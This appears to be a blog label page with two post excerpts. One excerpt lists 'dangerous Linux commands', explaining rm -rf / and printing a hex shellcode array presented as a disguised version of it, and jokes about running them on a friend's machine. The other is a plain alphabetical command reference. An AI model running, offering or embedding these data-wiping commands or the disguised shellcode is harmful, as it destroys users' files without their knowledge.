Skip to main content

Posts

Showing posts with the label Linux COmmands

Superb Linux Commands To do Fun With.

Dangerous Linux Commands To Play :) Don't ever Run These Commands on Your Linux Desktop...... Ahh  well you can Try on Your Friends Linux Destro :) 1. rm -rf / Deletes everything including files on your hard drive and files on connected removable media devices. rm – Remove the following files. -rf – Run rm recursively and force-remove all files without prompting you. / – Tells rm to start at the root directory, which contains all the files on your computer and all mounted media devices,  including remote file shares and removable drives. 2. Disguised rm –rf / Actually, the hex version of rm –rf / – wipes out your files just as if you had run rm –rf /. char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\...

Linux COmmands

                      Linux COmmands alias Create an alias • a apropos Search Help manual pages (man -k) apt-get Search for and install software packages (Debian/Ubuntu) aptitude Search for and install software packages (Debian/Ubuntu) aspell Spell Checker awk Find and Replace text, database sort/validate/index b basename Strip directory and suffix from filenames bash GNU Bourne-Again SHell bc Arbitrary precision calculator language bg Send to background break Exit from a loop • builtin Run a shell builtin bzip2 Compress or decompress named file(s) c cal Display a calendar case Conditionally perform a command cat Concatenate and print (display) the content of files cd Change Directory cfdisk Partition table manipulator for Linux chgrp Change group ownership chmod Change access permissions chown Change file owner and group chroot Run a command with a different root directory chkconfig System services (...